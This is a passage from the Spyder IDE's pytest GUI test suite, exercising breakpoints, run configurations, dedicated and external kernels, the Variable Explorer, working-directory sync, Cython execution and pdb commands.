assert u'Spyder' in title
assert u'Python' in title
assert u'اختبار' in title
assert u'測試' in title
projects.close_project()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Fails sometimes on Windows and Mac")
@pytest.mark.parametrize("debugcell", [True, False])
def test_move_to_first_breakpoint(main_window, qtbot, debugcell):
"""Test that we move to the first breakpoint if there's one present."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Main variables
control = shell._control
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Set breakpoint
code_editor.debugger.toogle_breakpoint(line_number=10)
qtbot.wait(500)
cursor = code_editor.textCursor()
cursor.setPosition(0)
code_editor.setTextCursor(cursor)
if debugcell:
# Advance 2 cells
for i in range(2):
qtbot.keyClick(code_editor, Qt.Key_Return,
modifier=Qt.ShiftModifier)
qtbot.wait(500)
# Debug the cell
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return,
modifier=Qt.AltModifier | Qt.ShiftModifier)
# Make sure everything is ready
assert shell.spyder_kernel_comm.is_open()
assert shell.is_waiting_pdb_input()
with qtbot.waitSignal(shell.executed):
shell.pdb_execute('!b')
assert 'script.py:10' in shell._control.toPlainText()
# We need to press continue as we don't test yet if a breakpoint
# is in the cell
with qtbot.waitSignal(shell.executed):
shell.pdb_execute('!c')
else:
# Click the debug button
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Verify that we are at first breakpoint
shell.clear_console()
qtbot.wait(500)
with qtbot.waitSignal(shell.executed):
shell.pdb_execute("!list")
assert "1--> 10 arr = np.array(li)" in control.toPlainText()
# Exit debugging
with qtbot.waitSignal(shell.executed):
shell.pdb_execute("!exit")
# Set breakpoint on first line with code
code_editor.debugger.toogle_breakpoint(line_number=2)
# Click the debug button
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Wait until continue and stop on the breakpoint
qtbot.waitUntil(lambda: "IPdb [2]:" in control.toPlainText())
# Verify that we are still on debugging
assert shell.is_waiting_pdb_input()
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason='Fails on windows!')
def test_runconfig_workdir(main_window, qtbot, tmpdir):
"""Test runconfig workdir options."""
from spyder.plugins.run.widgets import RunConfiguration
CONF.set('run', 'configurations', [])
# ---- Load test file ----
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# --- Use cwd for this file ---
rc = RunConfiguration().get()
rc['file_dir'] = False
rc['cw_dir'] = True
config_entry = (test_file, rc)
CONF.set('run', 'configurations', [config_entry])
# --- Run test file ---
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
# --- Assert we're in cwd after execution ---
with qtbot.waitSignal(shell.executed):
shell.execute('import os; current_dir = os.getcwd()')
assert shell.get_value('current_dir') == get_home_dir()
# --- Use fixed execution dir for test file ---
temp_dir = str(tmpdir.mkdir("test_dir"))
rc['file_dir'] = False
rc['cw_dir'] = False
rc['fixed_dir'] = True
rc['dir'] = temp_dir
config_entry = (test_file, rc)
CONF.set('run', 'configurations', [config_entry])
# --- Run test file ---
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
# --- Assert we're in fixed dir after execution ---
with qtbot.waitSignal(shell.executed):
shell.execute('import os; current_dir = os.getcwd()')
assert shell.get_value('current_dir') == temp_dir
# ---- Closing test file and resetting config ----
main_window.editor.close_file()
CONF.set('run', 'configurations', [])
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or sys.platform == 'darwin',
reason="It's failing there")
def test_dedicated_consoles(main_window, qtbot):
"""Test running code in dedicated consoles."""
from spyder.plugins.run.widgets import RunConfiguration
# ---- Load test file ----
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# --- Set run options for this file ---
rc = RunConfiguration().get()
# A dedicated console is used when these two options are False
rc['current'] = rc['systerm'] = False
config_entry = (test_file, rc)
CONF.set('run', 'configurations', [config_entry])
# --- Run test file and assert that we get a dedicated console ---
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
nsb = main_window.variableexplorer.current_widget()
assert len(main_window.ipyconsole.get_clients()) == 2
assert main_window.ipyconsole.get_widget().filenames == ['', test_file]
assert main_window.ipyconsole.get_widget().tabwidget.tabText(1) == 'script.py/A'
qtbot.wait(500)
assert nsb.editor.source_model.rowCount() == 4
# --- Assert only runfile text is present and there's no banner text ---
# See spyder-ide/spyder#5301.
text = control.toPlainText()
assert ('runfile' in text) and not ('Python' in text or 'IPython' in text)
# --- Clean namespace after re-execution ---
with qtbot.waitSignal(shell.executed):
shell.execute('zz = -1')
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
assert not shell.is_defined('zz')
# --- Assert runfile text is present after reruns ---
assert 'runfile' in control.toPlainText()
# ---- Closing test file and resetting config ----
main_window.editor.close_file()
CONF.set('run', 'configurations', [])
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform.startswith('linux'),
reason="Fails frequently on Linux")
def test_connection_to_external_kernel(main_window, qtbot):
"""Test that only Spyder kernels are connected to the Variable Explorer."""
# Test with a generic kernel
km, kc = start_new_kernel()
main_window.ipyconsole.get_widget()._create_client_for_kernel(
kc.connection_file, None, None, None)
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert that there are no variables in the variable explorer
main_window.variableexplorer.change_visibility(True)
nsb = main_window.variableexplorer.current_widget()
qtbot.wait(500)
assert nsb.editor.source_model.rowCount() == 0
python_shell = shell
# Test with a kernel from Spyder
spykm, spykc = start_new_kernel(spykernel=True)
main_window.ipyconsole.get_widget()._create_client_for_kernel(
spykc.connection_file, None, None, None)
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert that a variable is visible in the variable explorer
main_window.variableexplorer.change_visibility(True)
nsb = main_window.variableexplorer.current_widget()
qtbot.wait(500)
assert nsb.editor.source_model.rowCount() == 1
# Test runfile in external_kernel
run_action = main_window.run_toolbar_actions[0]
run_button = main_window.run_toolbar.widgetForAction(run_action)
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(
"print(2 + 1)"
)
# Start running
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(run_button, Qt.LeftButton)
assert "runfile" in shell._control.toPlainText()
assert "3" in shell._control.toPlainText()
# Try quitting the kernels
shell.execute('quit()')
python_shell.execute('quit()')
qtbot.wait(1000)
# Make sure everything quit properly
assert not km.is_alive()
assert not spykm.is_alive()
# Close the channels
spykc.stop_channels()
kc.stop_channels()
@pytest.mark.order(1)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_change_types_in_varexp(main_window, qtbot):
"""Test that variable types can't be changed in the Variable Explorer."""
# Create object
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Edit object
main_window.variableexplorer.change_visibility(True)
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT)
nsb.editor.setFocus()
nsb.editor.edit_item()
# Try to change types
qtbot.keyClicks(QApplication.focusWidget(), "'s'")
qtbot.keyClick(QApplication.focusWidget(), Qt.Key_Enter)
qtbot.wait(1000)
# Assert object remains the same
assert shell.get_value('a') == 10
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize("test_directory", [u"non_ascii_ñ_í_ç", u"test_dir"])
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
def test_change_cwd_ipython_console(
main_window, qtbot, tmpdir, test_directory):
"""
Test synchronization with working directory and File Explorer when
changing cwd in the IPython console.
"""
wdir = main_window.workingdirectory
treewidget = main_window.explorer.get_widget().treewidget
shell = main_window.ipyconsole.get_current_shellwidget()
# Wait until the window is fully up
qtbot.waitUntil(
lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Create temp dir
temp_dir = str(tmpdir.mkdir(test_directory))
# Change directory in IPython console using %cd
with qtbot.waitSignal(shell.executed):
shell.execute(u"%cd {}".format(temp_dir))
qtbot.wait(1000)
# Assert that cwd changed in workingdirectory
assert osp.normpath(wdir.get_container().history[-1]) == osp.normpath(
temp_dir)
# Assert that cwd changed in explorer
assert osp.normpath(treewidget.get_current_folder()) == osp.normpath(
temp_dir)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize("test_directory", [u"non_ascii_ñ_í_ç", u"test_dir"])
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
def test_change_cwd_explorer(main_window, qtbot, tmpdir, test_directory):
"""
Test synchronization with working directory and IPython console when
changing directories in the File Explorer.
"""
wdir = main_window.workingdirectory
explorer = main_window.explorer
shell = main_window.ipyconsole.get_current_shellwidget()
# Wait until the window is fully up
qtbot.waitUntil(
lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Create temp directory
temp_dir = to_text_string(tmpdir.mkdir(test_directory))
# Change directory in the explorer widget
explorer.chdir(temp_dir)
qtbot.wait(1000)
# Assert that cwd changed in workingdirectory
assert osp.normpath(wdir.get_container().history[-1]) == osp.normpath(
temp_dir)
# Assert that cwd changed in IPython console
assert osp.normpath(temp_dir) == osp.normpath(shell._cwd)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
(os.name == 'nt' or sys.platform == 'darwin' or
parse_version(ipy_release.version) == parse_version('7.11.0')),
reason="Hard to test on Windows and macOS and fails for IPython 7.11.0")
def test_run_cython_code(main_window, qtbot):
"""Test all the different ways we have to run Cython code"""
# ---- Setup ----
# Get a reference to the code editor widget
code_editor = main_window.editor.get_focus_widget()
# ---- Run pyx file ----
# Load test file
main_window.editor.load(osp.join(LOCATION, 'pyx_script.pyx'))
# Run file
qtbot.keyClick(code_editor, Qt.Key_F5)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.current_widget()
# Wait until an object appears
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=COMPILE_AND_EVAL_TIMEOUT)
# Verify result
shell = main_window.ipyconsole.get_current_shellwidget()
assert shell.get_value('a') == 3628800
# Reset and close file
reset_run_code(qtbot, shell, code_editor, nsb)
main_window.editor.close_file()
# ---- Import pyx file ----
# Load test file
main_window.editor.load(osp.join(LOCATION, 'pyx_lib_import.py'))
# Run file
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=COMPILE_AND_EVAL_TIMEOUT)
# Verify result
assert shell.get_value('b') == 3628800
# Close file
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It fails on Windows.")
def test_open_notebooks_from_project_explorer(main_window, qtbot, tmpdir):
"""Test that notebooks are open from the Project explorer."""
projects = main_window.projects
projects.toggle_view_action.setChecked(True)
editorstack = main_window.editor.get_current_editorstack()
# Create a temp project directory
project_dir = to_text_string(tmpdir.mkdir('test'))
# Create an empty notebook in the project dir
nb = osp.join(LOCATION, 'notebook.ipynb')
shutil.copy(nb, osp.join(project_dir, 'notebook.ipynb'))
# Create project
with qtbot.waitSignal(projects.sig_project_loaded):
projects._create_project(project_dir)
# Select notebook in the project explorer
idx = projects.get_widget().treewidget.get_index(
osp.join(project_dir, 'notebook.ipynb'))
projects.get_widget().treewidget.setCurrentIndex(idx)
# Prese Enter there
qtbot.keyClick(projects.get_widget().treewidget, Qt.Key_Enter)
# Assert that notebook was open
assert 'notebook.ipynb' in editorstack.get_current_filename()
# Convert notebook to a Python file
projects.get_widget().treewidget.convert_notebook(
osp.join(project_dir, 'notebook.ipynb'))
# Assert notebook was open
assert 'untitled' in editorstack.get_current_filename()
# Assert its contents are the expected ones
file_text = editorstack.get_current_editor().toPlainText()
if nbconvert.__version__ >= '5.4.0':
expected_text = ('#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:'
'\n\n\n1 + 1\n\n\n# In[ ]:\n\n\n\n\n')
else:
expected_text = '\n# coding: utf-8\n\n# In[1]:\n\n\n1 + 1\n\n\n'
assert file_text == expected_text
# Close project
projects.close_project()
@pytest.mark.slow
@flaky(max_runs=3)
def test_runfile_from_project_explorer(main_window, qtbot, tmpdir):
"""Test that file are run from the Project explorer."""
projects = main_window.projects
projects.toggle_view_action.setChecked(True)
editorstack = main_window.editor.get_current_editorstack()
# Create a temp project directory
project_dir = to_text_string(tmpdir.mkdir('test'))
# Create an empty file in the project dir
test_file = osp.join(LOCATION, 'script.py')
shutil.copy(test_file, osp.join(project_dir, 'script.py'))
# Create project
with qtbot.waitSignal(projects.sig_project_loaded):
projects._create_project(project_dir)
# Select file in the project explorer
idx = projects.get_widget().treewidget.get_index(
osp.join(project_dir, 'script.py'))
projects.get_widget().treewidget.setCurrentIndex(idx)
# Press Enter there
qtbot.keyClick(projects.get_widget().treewidget, Qt.Key_Enter)
# Assert that the file was open
assert 'script.py' in editorstack.get_current_filename()
# Run Python file
projects.get_widget().treewidget.run([osp.join(project_dir, 'script.py')])
# Wait until the new console is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Wait until all objects have appeared in the variable explorer
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Check variables value
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
# Close project
projects.close_project()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_set_new_breakpoints(main_window, qtbot):
"""Test that new breakpoints are set in the IPython console."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Set a breakpoint
code_editor = main_window.editor.get_focus_widget()
code_editor.debugger.toogle_breakpoint(line_number=6)
# Verify that the breakpoint was set
with qtbot.waitSignal(shell.executed):
shell.pdb_execute("!b")
assert "1 breakpoint keep yes at {}:6".format(test_file) in control.toPlainText()
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
def test_run_code(main_window, qtbot, tmpdir):
"""Test all the different ways we have to run code"""
# ---- Setup ----
p = (tmpdir.mkdir(u"runtest's folder èáïü Øαôå 字分误")
.join(u"runtest's file èáïü Øαôå 字分误.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.current_widget()
# ---- Run file ----
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Run lines ----
# Run the whole file line by line
for _ in range(code_editor.blockCount()):
qtbot.keyClick(code_editor, Qt.Key_F9)
qtbot.wait(200)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Run cell and advance ----
# Run the five cells present in file
# Add an unnamed cell at the top of the file
qtbot.keyClicks(code_editor, 'a = 10')
qtbot.keyClick(code_editor, Qt.Key_Return)
qtbot.keyClick(code_editor, Qt.Key_Up)
for _ in range(5):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
# Check for errors and the runcell function
assert 'runcell' in shell._control.toPlainText()
assert 'Error:' not in shell._control.toPlainText()
control_text = shell._control.toPlainText()
# Rerun
shell.setFocus()
qtbot.keyClick(shell._control, Qt.Key_Up)
qtbot.wait(500)
qtbot.keyClick(shell._control, Qt.Key_Enter, modifier=Qt.ShiftModifier)
qtbot.wait(500)
code_editor.setFocus()
assert control_text != shell._control.toPlainText()
control_text = shell._control.toPlainText()[len(control_text):]
# Check for errors and the runcell function
assert 'runcell' in control_text
assert 'Error' not in control_text
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert ']: 10\n' in shell._control.toPlainText()
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Run cell ----
# Run the first cell in file
modifier = Qt.ControlModifier
if sys.platform == 'darwin':
modifier = Qt.MetaModifier
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=modifier)
# Wait until the object has appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=EVAL_TIMEOUT)
# Verify result
assert shell.get_value('a') == 10
# Press Ctrl+Enter a second time to verify that we're *not* advancing
# to the next cell
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=modifier)
assert nsb.editor.source_model.rowCount() == 1
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Debug cell ------
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return,
modifier=Qt.AltModifier | Qt.ShiftModifier)
qtbot.keyClicks(shell._control, '!c')
qtbot.keyClick(shell._control, Qt.Key_Enter)
# Wait until the object has appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=EVAL_TIMEOUT)
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Re-run last cell ----
# Run the first three cells in file
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
# Wait until objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 2,
timeout=EVAL_TIMEOUT)
# Clean namespace
with qtbot.waitSignal(shell.executed):
shell.execute('%reset -f')
# Wait until there are no objects in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0,
timeout=EVAL_TIMEOUT)
# Re-run last cell
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.AltModifier)
# Wait until the object has appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=EVAL_TIMEOUT)
assert shell.get_value('li') == [1, 2, 3]
# ---- Closing test file ----
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
@pytest.mark.parametrize('main_window',
[{'spy_config': ('editor', 'run_cell_copy', True)}],
indirect=True)
def test_run_cell_copy(main_window, qtbot, tmpdir):
"""Test all the different ways we have to run code"""
# ---- Setup ----
p = (tmpdir.mkdir(u"runtest's folder èáïü Øαôå 字分误")
.join(u"runtest's file èáïü Øαôå 字分误.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Make sure run_cell_copy is properly set
for editorstack in main_window.editor.editorstacks:
editorstack.set_run_cell_copy(True)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.current_widget()
# ---- Run cell and advance ----
# Run the three cells present in file
for _ in range(4):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
# Check for errors and the copied code
assert 'runcell' not in shell._control.toPlainText()
assert 'a = 10' in shell._control.toPlainText()
assert 'Error:' not in shell._control.toPlainText()
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert ']: 10\n' in shell._control.toPlainText()
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
# ---- Closing test file and reset config ----
main_window.editor.close_file()
CONF.set('editor', 'run_cell_copy', False)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(running_in_ci(), reason="Fails on CIs")
def test_open_files_in_new_editor_window(main_window, qtbot):
"""
This tests that opening files in a new editor window
is working as expected.
Test for spyder-ide/spyder#4085.
"""
# Set a timer to manipulate the open dialog while it's running
QTimer.singleShot(2000, lambda: open_file_in_editor(main_window,
'script.py',
directory=LOCATION))
# Create a new editor window
# Note: editor.load() uses the current editorstack by default
main_window.editor.create_new_window()
main_window.editor.load()
# Perform the test
# Note: There's always one file open in the Editor
editorstack = main_window.editor.get_current_editorstack()
assert editorstack.get_stack_count() == 2
@pytest.mark.slow
@flaky(max_runs=3)
def test_close_when_file_is_changed(main_window, qtbot):
"""Test closing spyder when there is a file with modifications open."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
editorstack = main_window.editor.get_current_editorstack()
editor = editorstack.get_current_editor()
editor.document().setModified(True)
# Wait for the segfault
qtbot.wait(3000)
@pytest.mark.slow
@flaky(max_runs=3)
def test_maximize_minimize_plugins(main_window, qtbot):
"""Test that the maximize button is working correctly."""
# Set focus to the Editor
main_window.editor.get_focus_widget().setFocus()
# Click the maximize button
max_action = main_window.layouts.maximize_action
max_button = main_window.main_toolbar.widgetForAction(max_action)
qtbot.mouseClick(max_button, Qt.LeftButton)
# Verify that the Editor is maximized
assert main_window.editor._ismaximized
# Verify that the action minimizes the plugin too
qtbot.mouseClick(max_button, Qt.LeftButton)
assert not main_window.editor._ismaximized
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or running_in_ci() and PYQT_VERSION >= '5.9',
reason="It times out on Windows and segfaults in our CIs with PyQt >= 5.9")
def test_issue_4066(main_window, qtbot):
"""
Test for a segfault when these steps are followed:
1. Open an object present in the Variable Explorer (e.g. a list).
2. Delete that object in its corresponding console while its
editor is still open.
3. Closing that editor by pressing its *Ok* button.
"""
# Create the object
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('myobj = [1, 2, 3]')
# Open editor associated with that object and get a reference to it
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT)
nsb.editor.setFocus()
nsb.editor.edit_item()
obj_editor_id = list(nsb.editor.delegate._editors.keys())[0]
obj_editor = nsb.editor.delegate._editors[obj_editor_id]['editor']
# Move to the IPython console and delete that object
main_window.ipyconsole.get_widget().get_focus_widget().setFocus()
with qtbot.waitSignal(shell.executed):
shell.execute('del myobj')
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0, timeout=EVAL_TIMEOUT)
# Close editor
ok_widget = obj_editor.btn_close
qtbot.mouseClick(ok_widget, Qt.LeftButton)
# Wait for the segfault
qtbot.wait(3000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_varexp_edit_inline(main_window, qtbot):
"""
Test for errors when editing inline values in the Variable Explorer
and then moving to another plugin.
Note: Errors for this test don't appear related to it but instead they
are shown down the road. That's because they are generated by an
async C++ RuntimeError.
"""
# Create object
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Edit object
main_window.variableexplorer.change_visibility(True)
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT)
nsb.editor.setFocus()
nsb.editor.edit_item()
# Change focus to IPython console
main_window.ipyconsole.get_widget().get_focus_widget().setFocus()
# Wait for the error
qtbot.wait(3000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="It times out sometimes on Windows and macOS")
def test_c_and_n_pdb_commands(main_window, qtbot):
"""Test that c and n Pdb commands update the Variable Explorer."""
nsb = main_window.variableexplorer.current_widget()
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Set a breakpoint
code_editor = main_window.editor.get_focus_widget()
code_editor.debugger.toogle_breakpoint(line_number=6)
qtbot.wait(500)
# Verify that c works
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!c')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: nsb.editor.source_model.rowCount() == 1)
# Verify that n works
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: nsb.editor.source_model.rowCount() == 2)
# Verify that doesn't go to sitecustomize.py with next and stops
# the debugging session.
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: nsb.editor.source_model.rowCount() == 3)
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
# Assert that the prompt appear
shell.clear_console()
assert 'In [2]:' in control.toPlainText()
